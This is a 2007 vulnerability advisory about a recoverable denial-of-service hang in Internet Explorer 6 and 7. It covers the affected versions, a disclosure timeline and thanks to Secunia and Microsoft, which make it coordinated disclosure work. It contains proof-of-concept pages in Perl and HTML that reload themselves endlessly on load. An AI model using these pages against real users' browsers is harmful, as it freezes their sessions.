###########################################################
Internet Explorer Body tag recoverable DoS issue
Vendor url:http://www.microsoft.com
Advisore:http://lostmon.blogspot.com/2007/04/posible-ie7-dos.html
Vendor notify:YES Vendor confirmed:YES Exploit include:YES
###########################################################


Microsoft Internet Explorer contains a flaw that may allow a
malicious user to cause IE7 to enter a loop in which IE7
become unresponsive resulting in a recoverable DoS issue.
(Only affect the process what we open the file)the user,only can
terminate the process

The result in Internet Explorer is the browser seems to "hang".
I have not discovered a way to leverage the "hang" to gain
execution of arbitrary code.


############
versions
############

Tested on all of this versions:

#########
IE7
#########

Windows Vista =>vulnerable
Windows XP SP2 =>vulnerable
Windows XP Home SP2 =>vulnerable

#########
IE6
#########

Windows 2000 => Not vulnerable ?
Windows XP SP2 =>vulnerable
Windows XP Home SP2 =>vulnerable


############
Solution
###########

Microsoft is working in a
update version, patch or similar.

#############
Timeline
#############

Discovered:29-01-2007
Vendor notify: 11-03-2007
Vendor response:11-03-2007
Private Disclosure:07-02-2007
Public Disclosure: 25-04-2007



#########################

IE7 and 6 Body tag PoC

#########################



###################

Source of eso.pl

###################



 print  "<html>\ n";
 print  "<head>";
 print  "<title>";
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)";
 print  "</title>";
 print  "</head>";
 print  "<body onload='location.reload()'>";
 print  "<p><a href='http://lostmon.blogspot.com/'>";
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)";
 print  "</a></p>";
 print  "</body>";
 print  "</html>";

##############################

##############################

Source of eso.html

##############################



 print  "<html>\ n"
 print  "<head>"
 print  "<title>"
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)"
 print  "</title>"
 print  "</head>"
 print  "<body onload='location.reload()'>"
 print  "<p><a href='http://lostmon.blogspot.com/'>"
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)"
 print  "</a></p>"
 print  "</body>"
 print  "</html>"


###############################

###############################

Source of eso.htm

###############################



<html>
<head>
<title>
Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)
</title>
</head>
<body onload='location.reload()'>
<p><a href='http://lostmon.blogspot.com/'>
Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)
</a>
</p>
</body>
</html>

################################



#######################End###################



Special THnx to Secunia Research Team they made
me include/understand of which one treated and
put in my hands !!!ALL!!! What i need for this research !!!!
Secunia:http://www.secunia.com/

Thnx To estrella pq siempre estas en mi pensamiento
aunque no coincidamos y por plantar en mi la semilla
de la curiosidad , durante noches y noches !!

Thnx To FalconDeOro :
la paciencia es un a virtud pequeño Jedy !!
Gracias por tu ayuda y soporte :*

Thnx to all Microsoft Security Response Center
in specia To Annette.
http://www.microsoft.com/technet/security/

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....